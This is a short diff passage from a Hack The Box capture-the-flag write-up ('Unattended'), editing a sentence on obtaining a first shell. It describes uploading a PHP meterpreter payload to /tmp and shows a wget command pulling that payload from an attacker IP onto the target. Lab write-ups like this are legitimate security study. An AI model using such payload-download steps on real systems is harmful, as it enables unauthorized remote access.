slemire/slemire.github.io/_posts/2019-08-24-htb-writeup-unattended.md

 ### First shell using Metasploit

-I can't execute code but if I upload a PHP meterpreter payload into `/tmp` I can execute it since the `php` binary is in the main partition that is executable.
+If I upload a PHP meterpreter payload into `/tmp` I can execute it since the `php` binary is in the main partition that is executable.

 ```
 > wget http://10.10.14.23:443/snowscan.php -O /tmp/snowscan.php